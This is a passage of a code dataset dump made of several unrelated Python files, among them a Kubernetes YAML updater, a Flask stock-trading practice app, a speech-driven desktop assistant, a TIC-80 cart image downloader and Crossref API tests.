str(node_name_list)[1:-1] + \"):\")\n return node_name\n\nnode_num = int(os.popen(\"kubectl get node | awk '{print $1}' | sed -n '2, $p' | wc -l\").read())\nprint(\"There are \" + str(node_num) + \" kubernetes nodes on your host server!!!\")\n\nif node_num == 0:\n os._exit(0)\n\nnode_name_list = os.popen(\"kubectl get node | awk '{print $1}' | sed -n '2, $p'\").read().split(\"\\n\")\nnode_name_list = list(filter(None, node_name_list))\n\nnfs_server = \"localhost\"\nadi_directory = os.path.dirname(os.path.dirname(sys.argv[1]))\nprint(\"Looking for ADI home directory at: \" + adi_directory )\n\n\n#zookeeper\nnode_name = input_node_name(\"zookeeper\")\n\nyaml_file = sys.argv[1] + \"/zookeeper-deployment.yaml\"\ndata = yaml_utils.load_yaml_file(yaml_file)\n\n# kafka\nnode_name = input_node_name(\"kafka\")\n\nyaml_file = sys.argv[1] + \"/kafka-service-deployment.yaml\"\ndata = yaml_utils.load_yaml_file(yaml_file)\n\n# kafka-init\nnode_name = input_node_name(\"kafka-init\")\n\nyaml_file = sys.argv[1] + \"/kafka-init-deployment.yaml\"\ndata = yaml_utils.load_yaml_file(yaml_file)\n\n\n#database\nnode_name = input_node_name(\"database\")\n\nyaml_file = sys.argv[1] + \"/database-deployment.yaml\"\ndata = yaml_utils.load_yaml_file(yaml_file)\n\n# cdn\nnode_name = input_node_name(\"cdn\")\n\nyaml_file = sys.argv[1] + \"/cdn-deployment.yaml\"\ndata = yaml_utils.load_yaml_file(yaml_file)\nyaml_utils.add_volumeMounts(data, yaml_file, \"cdn\")\nyaml_utils.add_volumes(data, yaml_file, nfs_server, \"cdn\", adi_directory)\n\n#video-analytic-ffmpeg\nnode_name = input_node_name(\"video-analytic-ffmpeg\")\n\nyaml_file = sys.argv[1] + \"/video-analytic-ffmpeg-deployment.yaml\"\ndata = yaml_utils.load_yaml_file(yaml_file)\n\n#video-analytic-gstreamer\nnode_name = input_node_name(\"video-analytic-gstreamer\")\n\nyaml_file = sys.argv[1] + \"/video-analytic-gstreamer-deployment.yaml\"\ndata = yaml_utils.load_yaml_file(yaml_file)\n\n#ad-transcode\nnode_name = input_node_name(\"ad-transcode\")\n\nyaml_file = sys.argv[1] + \"/ad-transcode-deployment.yaml\"\ndata = yaml_utils.load_yaml_file(yaml_file)\nyaml_utils.add_volumeMounts(data, yaml_file, \"ad-transcode\")\nyaml_utils.add_volumes(data, yaml_file, nfs_server, \"ad-transcode\", adi_directory)\n#yaml_utils.add_volumes(data, yaml_file, nfs_server, False, adi_directory)\n\n#account-service\nnode_name = input_node_name(\"account-service\")\n\nyaml_file = sys.argv[1] + \"/account-service-deployment.yaml\"\ndata = yaml_utils.load_yaml_file(yaml_file)\n#yaml_utils.add_volumes(data, yaml_file, nfs_server, False, adi_directory)\n\n#ad-decision\nnode_name = input_node_name(\"ad-decision\")\n\nyaml_file = sys.argv[1] + \"/ad-decision-deployment.yaml\"\ndata = yaml_utils.load_yaml_file(yaml_file)\n#yaml_utils.add_volumes(data, yaml_file, nfs_server, False, adi_directory)\n\n\n#ad-content\nnode_name = input_node_name(\"ad-content\")\n\nyaml_file = sys.argv[1] + \"/ad-content-deployment.yaml\"\ndata = yaml_utils.load_yaml_file(yaml_file)\nyaml_utils.add_volumeMounts(data, yaml_file, \"ad-content\")\nyaml_utils.add_volumes(data, yaml_file, nfs_server, \"ad-content\", adi_directory)\n\n#\"ad-insertion-frontend\"\nnode_name = input_node_name(\"ad-insertion-frontend\")\n\nyaml_file = sys.argv[1] + \"/ad-insertion-frontend-deployment.yaml\"\ndata = yaml_utils.load_yaml_file(yaml_file)\nyaml_utils.add_volumeMounts(data, yaml_file, \"ad-insertion-frontend\")\nyaml_utils.add_volumes(data, yaml_file, nfs_server, \"ad-insertion-frontend\", adi_directory)\n#yaml_utils.add_volumes(data, yaml_file, nfs_server, False, adi_directory)\n\n#analytic-db\nnode_name = input_node_name(\"analytic-db\")\n\nyaml_file = sys.argv[1] + \"/analytic-db-deployment.yaml\"\ndata = yaml_utils.load_yaml_file(yaml_file)\n#yaml_utils.add_volumes(data, yaml_file, nfs_server, False, adi_directory)\n\n#content-provider\nnode_name = input_node_name(\"content-provider\")\n\nyaml_file = sys.argv[1] + \"/content-provider-deployment.yaml\"\ndata = yaml_utils.load_yaml_file(yaml_file)\nyaml_utils.add_volumeMounts(data, yaml_file, \"content-provider\")\nyaml_utils.add_volumes(data, yaml_file, nfs_server, \"content-provider\", adi_directory)\n#yaml_utils.add_volumes(data, yaml_file, nfs_server, False, adi_directory)\n\n\n#content-provider-transcode\nnode_name = input_node_name(\"content-provider-transcode\")\n\nyaml_file = sys.argv[1] + \"/content-provider-transcode-deployment.yaml\"\ndata = yaml_utils.load_yaml_file(yaml_file)\nyaml_utils.add_volumeMounts(data, yaml_file, \"content-provider-transcode\")\nyaml_utils.add_volumes(data, yaml_file, nfs_server, \"content-provider-transcode\", adi_directory)\n#yaml_utils.add_volumes(data, yaml_file, nfs_server, False, adi_directory)\n\n","sub_path":"deployment/kubernetes/update_yaml.py","file_name":"update_yaml.py","file_ext":"py","file_size_in_byte":5601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"463646958","text":"class Solution:\n def calcEquation(self, equations: List[List[str]], values: List[float], queries: List[List[str]]) -> List[float]:\n def dfs(start, end):\n if end in graph[start]: return graph[start][end]\n visited.add(start)\n for neighbor in graph[start]:\n if neighbor not in visited:\n res=dfs(neighbor, end)\n if res!=-1: return res*graph[start][neighbor]\n\n return -1\n\n res=[0]*len(queries)\n graph=collections.defaultdict(collections.defaultdict)\n for i, e in enumerate(equations):\n graph[e[0]][e[1]]=values[i]\n graph[e[1]][e[0]]=1/values[i]\n\n for i, q in enumerate(queries):\n visited=set()\n res[i]=dfs(q[0], q[1])\n\n return res\n","sub_path":"python/evaluate-division.py","file_name":"evaluate-division.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"95397274","text":"\n# Reduce receives list and returns single result (can be used instead of loop)\nfrom functools import reduce\n\n# list\noneTo10 = list(range(1, 11))\nprint(oneTo10)\n\n# Add up the values in a list\nresult = reduce((lambda x, y: x + y), oneTo10)\nprint(result)\n","sub_path":"4 python cheet sheet/zj_lists_reduce.py","file_name":"zj_lists_reduce.py","file_ext":"py","file_size_in_byte":253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"558991643","text":"import matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom util import *\r\nfrom sys import argv\r\nfrom data_meta import *\r\n\r\n# python data_roi.py [matrixdir] [outputdir] [architecture]\r\n\r\ntrials = 100\r\ndef exprange(a, b, n):\r\n r = (float(b) / float(a))**(1.0/(n - 1))\r\n return [a * r**i for i in range(n)]\r\n\r\nn = 10\r\nasx_delta = 0.01\r\n\r\nmethods = [{\"name\":\"asx\",\r\n \"label\":\"ASX\",\r\n \"color\":\"red\",\r\n \"bound\" : lambda point : point[\"epsilon\"],\r\n \"bound_color\": \"green\"\r\n },\r\n {\"name\":\"oski\",\r\n \"label\":\"OSKI\",\r\n \"color\":\"blue\"}]\r\n\r\nmatrices = [{\"name\": \"3dtube_conv\",\r\n \"label\": \"3dtube\",\r\n \"asx\": {\"points\": [{\"epsilon\":e, \"delta\":asx_delta} for e in exprange(7, 0.2, n)]},\r\n \"oski\": {\"points\": [{\"delta\":d} for d in exprange(0.001, 0.06, n)]},\r\n \"ymax\": 0.5\r\n },\r\n {\"name\": \"gupta1_conv\",\r\n \"label\": \"gupta1\",\r\n \"asx\": {\"points\": [{\"epsilon\":e, \"delta\":asx_delta} for e in exprange(7, 0.2, n)]},\r\n \"oski\": {\"points\": [{\"delta\":d} for d in exprange(0.001, 0.06, n)]},\r\n \"ymax\": 0.5\r\n },\r\n {\"name\": \"ct20stif\",\r\n \"label\": \"ct20stif\",\r\n \"asx\": {\"points\": [{\"epsilon\":e, \"delta\":asx_delta} for e in exprange(7, 0.2, n)]},\r\n \"oski\": {\"points\": [{\"delta\":d} for d in exprange(0.001, 0.06, n)]},\r\n \"ymax\": 0.5\r\n },\r\n {\"name\": \"pathological_asx\",\r\n \"label\": \"pathological_ASX\",\r\n \"asx\": {\"points\": [{\"epsilon\":e, \"delta\":asx_delta} for e in exprange(2, 0.07, n)], \"bound\":True},\r\n \"oski\": {\"points\": [{\"delta\":d} for d in exprange(0.1, 1.0, n)]},\r\n \"ymax\": 0.5,\r\n \"xmaxmax\": True\r\n },\r\n {\"name\": \"pathological_oski\",\r\n \"label\": \"pathological_OSKI\",\r\n \"asx\": {\"points\": [{\"epsilon\":e, \"delta\":asx_delta} for e in exprange(2, 0.07, n)], \"bound\":True},\r\n \"oski\": {\"points\": [{\"delta\":d} for d in exprange(0.1, 1.0, n)]},\r\n \"ymax\": 4,\r\n \"xmaxmax\": True\r\n }\r\n ]\r\n\r\nreferences = get_references([matrix[\"name\"] for matrix in matrices], B = B)\r\nfor (reference, matrix) in zip(references, matrices):\r\n \r\n # generate local performance matrix\r\n filename = matrix['name'] + '.npy'\r\n tfile = os.path.join(spmv_times_dir, filename)\r\n assert os.path.isfile(tfile)\r\n matrix_times = np.load(tfile)\r\n\r\n # get time to do spmv with (0,0)\r\n base_time = matrix_times[0][0]\r\n # print(matrix[\"name\"])\r\n for method in methods:\r\n # print(method[\"name\"])\r\n times = []\r\n errors = []\r\n hi_bars = []\r\n lo_bars = []\r\n for point in matrix[method[\"name\"]][\"points\"]:\r\n # print(point)\r\n results = fill_estimates(method[\"name\"], [matrix[\"name\"]], B = B, results = True, trials = trials, **point)\r\n get_errors(results, [reference])\r\n times.append(results[0][\"time_mean\"] / base_time)\r\n errors.append(np.mean(results[0][\"errors\"]))\r\n hi_bars.append(np.std(results[0][\"errors\"]))\r\n lo_bars.append(np.std(results[0][\"errors\"]))\r\n\r\n outfile = 'error_' + method['name'] + '_' + matrix['name']\r\n out_path = os.path.join(roi_dir, outfile)\r\n\r\n # output in form\r\n # x y ylow yhigh\r\n with open(out_path, 'w') as out:\r\n for i in range(0, len(times)):\r\n out.write(str(times[i]) + ' ' + str(errors[i]) + ' ' + str(lo_bars[i]) + ' ' + str(hi_bars[i]) + '\\n')\r\n","sub_path":"src/data_roi.py","file_name":"data_roi.py","file_ext":"py","file_size_in_byte":3562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"388626468","text":"import os\nfrom flask import Flask, flash, redirect, render_template, request, session, jsonify\nfrom flask_session import Session\nfrom tempfile import mkdtemp\nfrom werkzeug.exceptions import default_exceptions\nfrom werkzeug.security import check_password_hash, generate_password_hash\nimport datetime\nimport re\nfrom cs50 import SQL\nfrom helpers import apology, login_required, lookup, usd\n\n# Configure application\napp = Flask(__name__)\n\n# Ensure templates are auto-reloaded\napp.config[\"TEMPLATES_AUTO_RELOAD\"] = True\n\n# Ensure responses aren't cached\n\n\n@app.after_request\ndef after_request(response):\n response.headers[\"Cache-Control\"] = \"no-cache, no-store, must-revalidate\"\n response.headers[\"Expires\"] = 0\n response.headers[\"Pragma\"] = \"no-cache\"\n return response\n\n\n# Custom filter\napp.jinja_env.filters[\"usd\"] = usd\n\n# Configure session to use filesystem (instead of signed cookies)\napp.config[\"SESSION_FILE_DIR\"] = mkdtemp()\napp.config[\"SESSION_PERMANENT\"] = False\napp.config[\"SESSION_TYPE\"] = \"filesystem\"\nSession(app)\n\n# Configure CS50 Library to use SQLite database\ndb = SQL(\"sqlite:///ordenes.db\")\n\n\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\n@login_required\ndef index():\n if request.method == \"POST\":\n dia = request.form.get(\"dia\")\n ordenes = db.execute(\"SELECT * FROM list_ord WHERE dia = :dia\", dia=dia)\n\n # print (ordenes[0][\"id_Operador\"])\n return render_template(\"index.html\", mordenes=ordenes, dia=dia)\n else:\n dia = datetime.date.today()\n\n ordenes = db.execute(\"SELECT * FROM list_ord WHERE dia = :dia\", dia=dia)\n\n # print (ordenes[0][\"id_Operador\"])\n return render_template(\"index.html\", mordenes=ordenes,dia=dia)\n\n\n@app.route(\"/busca_operadores\")\ndef busca_operadores():\n \"\"\"Busca Operadores\"\"\"\n\n # retrieve q from HTML form\n q = request.args.get(\"q\") + \"%\"\n # Finds any postal code, city and state that start with q\n operadores = db.execute(\"SELECT * FROM operadores WHERE nombre LIKE :q\", q=q)\n return jsonify(operadores)\n\n@app.route(\"/carga\", methods=[\"GET\", \"POST\"])\n@login_required\ndef carga():\n if request.method == \"POST\":\n # empezamos a instanciar todo lo que trae el POST para insertar en DB\n\n tipo_Op = request.form.get(\"tipo_Op\")\n cantidad = request.form.get(\"cantidad\")\n tipo_Activo = request.form.get(\"tipo_Activo\")\n producto = request.form.get(\"producto\")\n mes = request.form.get(\"mes\")\n precio = request.form.get(\"precio\")\n al_Mercado = request.form.get(\"al_Mercado\")\n id_Cliente = request.form.get(\"id_Cliente\")\n A_C = \"\"\n if request.form.get(\"AC_abre\") == \"A\":\n A_C = \"A\"\n\n if request.form.get(\"AC_cancela\") == \"C\":\n A_C = \"C\"\n\n prima = request.form.get(\"prima\")\n id_Operador = request.form.get(\"id_Operador\")\n id_Metodo = request.form.get(\"id_Metodo\")\n id_Cliente = request.form.get(\"id_Cliente\")\n dia = datetime.date.today()\n hora = request.form.get(\"hora\")\n id_user = session[\"user_id\"]\n print (A_C)\n db.execute(\"INSERT INTO list_ord (tipo_Op, cantidad, tipo_Activo, producto, mes, precio, al_Mercado, id_Cliente, A_C, prima, id_Operador, id_Metodo, dia, hora, id_User) Values(:tipo_Op, :cantidad, :tipo_Activo, :producto, :mes, :precio, :al_Mercado, :id_Cliente, :A_C, :prima, :id_Operador, :id_Metodo, :dia, :hora, :id_user)\",\n tipo_Op=tipo_Op, cantidad=cantidad, tipo_Activo=tipo_Activo, producto=producto, mes=mes, precio=precio, al_Mercado=al_Mercado, id_Cliente=id_Cliente, A_C=A_C, prima=prima, id_Operador=id_Operador, id_Metodo=id_Metodo, dia=dia, hora=hora, id_user=id_user)\n\n return redirect(\"/\")\n\n else:\n return render_template(\"carga.html\")\n\n@app.route(\"/buy\", methods=[\"GET\", \"POST\"])\n@login_required\ndef buy():\n \"\"\"Buy shares of stock\"\"\"\n if request.method == \"POST\":\n if not request.form.get(\"symbol\"):\n return apology(\"must provide stock\", 400)\n if not request.form.get(\"shares\"):\n return apology(\"must provide quantity\", 400)\n\n try:\n cantidad = int(request.form.get(\"shares\"))\n except:\n return apology(\"shares must be a positive integer\", 400)\n\n if cantidad < 1:\n return apology(\"can´t buy zero or a negative number of shares\", 400)\n\n quote = lookup(request.form.get(\"symbol\"))\n if quote == None:\n return apology(\"stock not found\", 400)\n\n cash_remaining = db.execute(\"SELECT cash FROM users WHERE id = :userid\", userid=session[\"user_id\"])\n in_cash_remaining = cash_remaining[0][\"cash\"]\n\n if quote[\"price\"] * int(request.form.get(\"shares\")) > in_cash_remaining:\n return apology(\"not enough funds\", 400)\n\n else: # ejecutar insert\n userid = session[\"user_id\"]\n fecha = datetime.datetime.now()\n stock = quote[\"symbol\"]\n tipo = \"BUY\"\n precio = quote[\"price\"]\n volumen = quote[\"price\"] * int(request.form.get(\"shares\"))\n\n db.execute(\"INSERT INTO anotes (username, fecha, stock, tipo, cantidad, precio) Values(:username, :fecha, :stock, :tipo, :cantidad, :precio)\",\n username=userid, fecha=fecha, stock=stock, tipo=tipo, cantidad=cantidad, precio=precio)\n\n db.execute(\"UPDATE users SET cash = cash - :volumen where id = :userid\", volumen=volumen, userid=userid)\n\n cash_remaining = db.execute(\"SELECT cash FROM users WHERE id = :userid\", userid=session[\"user_id\"])\n in_cash_remaining = cash_remaining[0][\"cash\"]\n\n return redirect(\"/\")\n\n else:\n return render_template(\"buy.html\")\n\n\n@app.route(\"/history\")\n@login_required\ndef history():\n acciones_db = db.execute(\n \"SELECT fecha, stock, tipo, cantidad, precio FROM anotes WHERE username = :userid\", userid=session[\"user_id\"])\n\n cash_remaining = db.execute(\"SELECT cash FROM users WHERE id = :userid\", userid=session[\"user_id\"])\n in_cash_remaining = cash_remaining[0][\"cash\"]\n\n for i in acciones_db:\n quote = lookup(i[\"stock\"])\n i[\"name\"] = quote[\"name\"]\n\n return render_template(\"history.html\", acciones=acciones_db)\n\n\n@app.route(\"/login\", methods=[\"GET\", \"POST\"])\ndef login():\n \"\"\"Log user in\"\"\"\n\n # Forget any user_id\n session.clear()\n\n # User reached route via POST (as by submitting a form via POST)\n if request.method == \"POST\":\n\n # Ensure username was submitted\n if not request.form.get(\"username\"):\n return apology(\"must provide username\", 403)\n\n # Ensure password was submitted\n elif not request.form.get(\"password\"):\n return apology(\"must provide password\", 403)\n\n # Query database for username\n rows = db.execute(\"SELECT * FROM users WHERE username = :username\",\n username=request.form.get(\"username\"))\n\n # Ensure username exists and password is correct\n if len(rows) != 1 or not check_password_hash(rows[0][\"hash\"], request.form.get(\"password\")):\n return apology(\"invalid username and/or password\", 403)\n\n # Remember which user has logged in\n session[\"user_id\"] = rows[0][\"id\"]\n\n # Redirect user to home page\n return redirect(\"/\")\n\n # User reached route via GET (as by clicking a link or via redirect)\n else:\n return render_template(\"login.html\")\n\n\n@app.route(\"/logout\")\ndef logout():\n \"\"\"Log user out\"\"\"\n\n # Forget any user_id\n session.clear()\n\n # Redirect user to login form\n return redirect(\"/\")\n\n\n@app.route(\"/quote\", methods=[\"GET\", \"POST\"])\n@login_required\ndef quote():\n \"\"\"Get stock quote.\"\"\"\n # User reached route via POST (as by submitting a form via POST)\n if request.method == \"POST\":\n if not request.form.get(\"symbol\"):\n return apology(\"must provide stock\", 400)\n\n quote = lookup(request.form.get(\"symbol\"))\n\n if quote == None:\n return apology(\"stock not found\", 400)\n\n return render_template(\"quoted.html\", name=quote[\"name\"], price=quote[\"price\"], symbol=quote[\"symbol\"])\n\n else:\n return render_template(\"quote.html\")\n\n\n@app.route(\"/register\", methods=[\"GET\", \"POST\"])\ndef register():\n \"\"\"Register user\"\"\"\n # User reached route via POST (as by submitting a form via POST)\n # User reached route via POST (as by submitting a form via POST)\n if request.method == \"POST\":\n\n # Ensure username was submitted\n if not request.form.get(\"username\"):\n return apology(\"Nombre de Usuario requerido\", 400)\n\n # Ensure password was submitted\n elif not request.form.get(\"password\"):\n return apology(\"Contraseña requerida\", 400)\n\n elif not request.form.get(\"password\") == request.form.get(\"confirmation\"):\n return apology(\"La contraseña y su confirmación deben ser idénticas\", 400)\n\n existe = db.execute(\"SELECT * FROM users WHERE username = :username\",\n username=request.form.get(\"username\"))\n\n if len(existe) == 1:\n return apology(\"Usuario existente\", 400)\n # INSERT new username, and login (vía Session ID)\n\n session[\"user_id\"] = db.execute(\"INSERT INTO users (username, hash) VALUES (:username, :hash_p)\",\n username=request.form.get(\"username\"), hash_p=generate_password_hash(request.form.get(\"password\")))\n\n return redirect(\"/\")\n\n # User reached route via GET (as by clicking a link or via redirect)\n else:\n return render_template(\"register.html\")\n\n\n@app.route(\"/sell\", methods=[\"GET\", \"POST\"])\n@login_required\ndef sell():\n \"\"\"Sell shares of stock\"\"\"\n if request.method == \"POST\":\n if not request.form.get(\"symbol\"):\n return apology(\"must provide stock\", 400)\n if not request.form.get(\"shares\"):\n return apology(\"must provide quantity\", 400)\n\n try:\n cantidad = int(request.form.get(\"shares\"))\n except:\n return apology(\"shares must be a positive integer\", 400)\n\n if cantidad < 1:\n return apology(\"can´t buy zero or a negative number of shares\", 400)\n\n quote = lookup(request.form.get(\"symbol\"))\n if quote == None:\n return apology(\"stock not found\", 400)\n\n acciones_db = db.execute(\"SELECT username, stock, SUM(cantidad) AS cant_total FROM anotes WHERE username = :userid and stock = :stock GROUP BY stock\",\n userid=session[\"user_id\"], stock=request.form.get(\"symbol\"))\n if len(acciones_db) == 0:\n return apology(\"stock not found\", 400)\n\n if acciones_db[0][\"cant_total\"] < int(request.form.get(\"shares\")):\n return apology(\"not enough shares to sell\", 400)\n\n else: # ejecutar insert\n userid = session[\"user_id\"]\n fecha = datetime.datetime.now()\n stock = quote[\"symbol\"]\n tipo = \"SELL\"\n cantidad = int(request.form.get(\"shares\"))\n precio = quote[\"price\"]\n volumen = quote[\"price\"] * cantidad\n\n db.execute(\"INSERT INTO anotes (username, fecha, stock, tipo, cantidad, precio) Values(:username, :fecha, :stock, :tipo, :cantidad, :precio)\",\n username=userid, fecha=fecha, stock=stock, tipo=tipo, cantidad=cantidad * -1, precio=precio)\n\n db.execute(\"UPDATE users SET cash = cash + :volumen where id = :userid\", volumen=volumen, userid=userid)\n\n cash_remaining = db.execute(\"SELECT cash FROM users WHERE id = :userid\", userid=session[\"user_id\"])\n in_cash_remaining = cash_remaining[0][\"cash\"]\n return redirect(\"/\")\n\n else:\n\n acciones_db = db.execute(\n \"SELECT stock, SUM(cantidad) AS cant_total FROM anotes WHERE username = :userid GROUP BY stock HAVING cant_total > 0\", userid=session[\"user_id\"])\n return render_template(\"sell.html\", acciones=acciones_db)\n\n\ndef errorhandler(e):\n \"\"\"Handle error\"\"\"\n return apology(e.name, e.code)\n\n\n# listen for errors\nfor code in default_exceptions:\n app.errorhandler(code)(errorhandler)","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":12229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"333496661","text":"def get_name():\n \"\"\"获取文件所在目录\"\"\"\n import os\n path = input(\"请输入初始化路径: \")\n name_cmd = input(\"请输入要查找的文件: \")\n list1 = list(os.walk(path, topdown=True))\n is_False = False\n for name in list1:\n for name2 in name[2]:\n if name2 == name_cmd:\n is_False = True\n print(name[0] + \"\\\\\"+name_cmd)\n if is_False is False:\n print(\"当前目录不存在此文件\")\n","sub_path":"代码/02-小甲鱼/01-列表/12-获取文件所在目录.py","file_name":"12-获取文件所在目录.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"434041120","text":"import pyttsx3\nimport datetime\nimport speech_recognition as sr\nimport wikipedia\nimport webbrowser\nimport os\n\nengine = pyttsx3.init()\nvoice = engine.getProperty('voices')\nengine.setProperty('voice', voice[1].id)\n\n\n\ndef speak(audio):\n engine.say(audio)\n engine.runAndWait()\n\n\ndef wishme():\n hour=int(datetime.datetime.now().hour)\n if hour>=0 and hour<12:\n speak(\"Good morning Sir\")\n elif hour>=12 and hour<5:\n speak(\"Good afternoon sir\")\n else:\n speak(\"good evening sir\")\n\n speak(\"Hello,I am your Jarvis.What can i do for you Sir\")\n\n\ndef takeCommand():\n #It takes microphone input from the user and returns string output\n\n r = sr.Recognizer()\n with sr.Microphone() as source:\n print(\"Listening...\")\n r.pause_threshold = .5\n audio = r.listen(source)\n\n try:\n print(\"Recognizing...\")\n query = r.recognize_google(audio, language='en-in')\n print(f\"User said: {query}\\n\")\n\n except Exception as e:\n # print(e)\n speak(\"Say that again please...\")\n return \"None\"\n return query\n\n\nif __name__ == '__main__':\n volume = engine.getProperty('volume')\n print(volume)\n rate=engine.getProperty('rate')\n engine.setProperty('rate',175)\n print(rate)\n wishme()\n while True:\n query = takeCommand().lower()\n if \"wikipedia\" in query:\n speak(\"Searching wikipedia\")\n query = query.replace(\"wikipedia\", \"\")\n results = wikipedia.summary(query, sentences=2)\n speak(\"According to wikipedia\")\n print(results)\n speak(results)\n elif \"thanks\" in query:\n speak(\"Never mind sir\")\n elif \"time\" in query:\n strtime = datetime.datetime.now().strftime(\"%H:%M:%S\")\n speak(\"Sir the time is\")\n speak(strtime)\n elif (\"open youtube\" in query) or (\"youtube\" in query):\n webbrowser.open(\"www.youtube.com\")\n elif (\"open facebook\" in query) or (\"facebook\" in query):\n webbrowser.open(\"www.facebook.com\")\n elif (\"open instagram\" in query) or (\"instagram\" in query):\n webbrowser.open(\"www.instagram.com\")\n elif \"open hackerrank\" in query:\n webbrowser.open(\"www.hackerrank.com\")\n elif \"open hackerone\" in query:\n webbrowser.open(\"www.hackerone.com\")\n elif \"open flipcart\" in query:\n webbrowser.open(\"www.flipcart.com\")\n elif (\"open google\" in query) or (\"google\" in query):\n webbrowser.open(\"www.google.com\")\n\n elif \"open pycharm \" in query:\n path = \"C:\\\\Program Files\\\\JetBrains\\\\PyCharm Community Edition 2020.2\\\\bin\\\\pycharm64.exe\"\n os.startfile(path)\n elif \"open burp suite\" in query:\n path = \"C:\\\\Users\\\\Batukeshwar\\\\Downloads\\\\burpsuite_pro_windows-x64_v2020_7.exe\"\n os.startfile(path)\n","sub_path":"assistant.py","file_name":"assistant.py","file_ext":"py","file_size_in_byte":2901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"278716987","text":"def conversion(strc):\n\tcvtable=[(0,'ZERO','Z'),(8,'EIGHT','G'),(6,'SIX','X'),(2,'TWO','W'),(4,'FOUR','U'),(1,'ONE','O'),(3,'THREE','H'),(5,'FIVE','F'),(7,'SEVEN','V'),(9,'NINE','I')]\n\trst=[]\n\tslen=len(strc)\n\tdata=[]\n\tfor i in range(slen):\n\t\tdata.append(strc[i])\n\tfor cvitem in cvtable:\n\t\tcount=data.count(cvitem[2])\n\t\tfor i in range(count):\n\t\t\trst.append(str(cvitem[0]))\n\t\tfor i in range(count):\n\t\t\ttemplen=len(cvitem[1])\n\t\t\tfor j in range(templen):\n\t\t\t\tix=data.index(cvitem[1][j])\n\t\t\t\tdata[ix]='-'\n\trst.sort()\n\tresult=''.join(rst)\n\treturn result\n\ndef phonenum(inputfile, outputfile):\n\tfr=open(inputfile,'r')\n\tT=int(fr.readline())\n\tprint(T,' cases.')\n\tfw=open(outputfile,'w')\n\tfor j in range(T):\n\t\tstrc=fr.readline()\n\t\tstrd=conversion(strc)\n\t\ts='Case #'+str(j+1)+': '+strd+'\\n'\n\t\tfw.write(s)\n\tfw.close()\n\tfr.close()\n\treturn\n","sub_path":"codes/CodeJamCrawler/16_2_1_neat/16_2_1_onefivefive_phonenum.py","file_name":"16_2_1_onefivefive_phonenum.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"223095223","text":"import urllib.request\nimport os.path\nimport shutil\n\nfrom bs4 import BeautifulSoup\nimport requests\n\ndef download(id):\n output_filename = os.path.join(\"media\",f\"cart_{id}.gif\")\n # Don't need to redownload. Save resources on Tic80\n if not os.path.exists(output_filename):\n url = f'https://tic80.com/play?cart={id}'\n req = requests.get(url)\n soup = BeautifulSoup(req.content,'html5lib')\n img = soup.find(\"meta\",{'property':\"og:image\"})\n img = img.attrs.get('content')\n r = requests.get(img, stream=True)\n if r.status_code == 200:\n with open(output_filename, 'wb') as f:\n r.raw.decode_content = True\n shutil.copyfileobj(r.raw, f) \ndef find_cart_id(event):\n for phase in event['phases']:\n for entry in phase['entries']:\n yield entry.get('tic80_cart_id', None)\n\ndef create_cache(event):\n tic80_carts = [ cart_id for cart_id in find_cart_id(event) if cart_id]\n for cart_id in tic80_carts:\n download(cart_id)","sub_path":"bin/download_tic80_cart_overview.py","file_name":"download_tic80_cart_overview.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"359017752","text":"\"\"\"Tests for Crossref.types\"\"\"\nimport os\nimport vcr\nimport pytest\n\nfrom habanero import exceptions\n\nfrom habanero import Crossref\n\ncr = Crossref()\n\na = {\n u\"items\": [\n {u\"id\": u\"book-section\", u\"label\": u\"Book Section\"},\n {u\"id\": u\"monograph\", u\"label\": u\"Monograph\"},\n {u\"id\": u\"report\", u\"label\": u\"Report\"},\n {u\"id\": u\"peer-review\", u\"label\": u\"Peer Review\"},\n {u\"id\": u\"book-track\", u\"label\": u\"Book Track\"},\n {u\"id\": u\"journal-article\", u\"label\": u\"Journal Article\"},\n {u\"id\": u\"book-part\", u\"label\": u\"Part\"},\n {u\"id\": u\"other\", u\"label\": u\"Other\"},\n {u\"id\": u\"book\", u\"label\": u\"Book\"},\n {u\"id\": u\"journal-volume\", u\"label\": u\"Journal Volume\"},\n {u\"id\": u\"book-set\", u\"label\": u\"Book Set\"},\n {u\"id\": u\"reference-entry\", u\"label\": u\"Reference Entry\"},\n {u\"id\": u\"proceedings-article\", u\"label\": u\"Proceedings Article\"},\n {u\"id\": u\"journal\", u\"label\": u\"Journal\"},\n {u\"id\": u\"component\", u\"label\": u\"Component\"},\n {u\"id\": u\"book-chapter\", u\"label\": u\"Book Chapter\"},\n {u\"id\": u\"report-series\", u\"label\": u\"Report Series\"},\n {u\"id\": u\"proceedings\", u\"label\": u\"Proceedings\"},\n {u\"id\": u\"standard\", u\"label\": u\"Standard\"},\n {u\"id\": u\"reference-book\", u\"label\": u\"Reference Book\"},\n {u\"id\": u\"posted-content\", u\"label\": u\"Posted Content\"},\n {u\"id\": u\"journal-issue\", u\"label\": u\"Journal Issue\"},\n {u\"id\": u\"dissertation\", u\"label\": u\"Dissertation\"},\n {u\"id\": u\"dataset\", u\"label\": u\"Dataset\"},\n {u\"id\": u\"book-series\", u\"label\": u\"Book Series\"},\n {u\"id\": u\"edited-book\", u\"label\": u\"Edited Book\"},\n {u\"id\": u\"standard-series\", u\"label\": u\"Standard Series\"},\n ],\n u\"total-results\": 27,\n}\n\n\n@vcr.use_cassette(\"test/vcr_cassettes/types.yaml\")\ndef test_types():\n \"types - basic test\"\n res = cr.types()\n assert dict == res.__class__\n assert dict == res[\"message\"].__class__\n assert a == 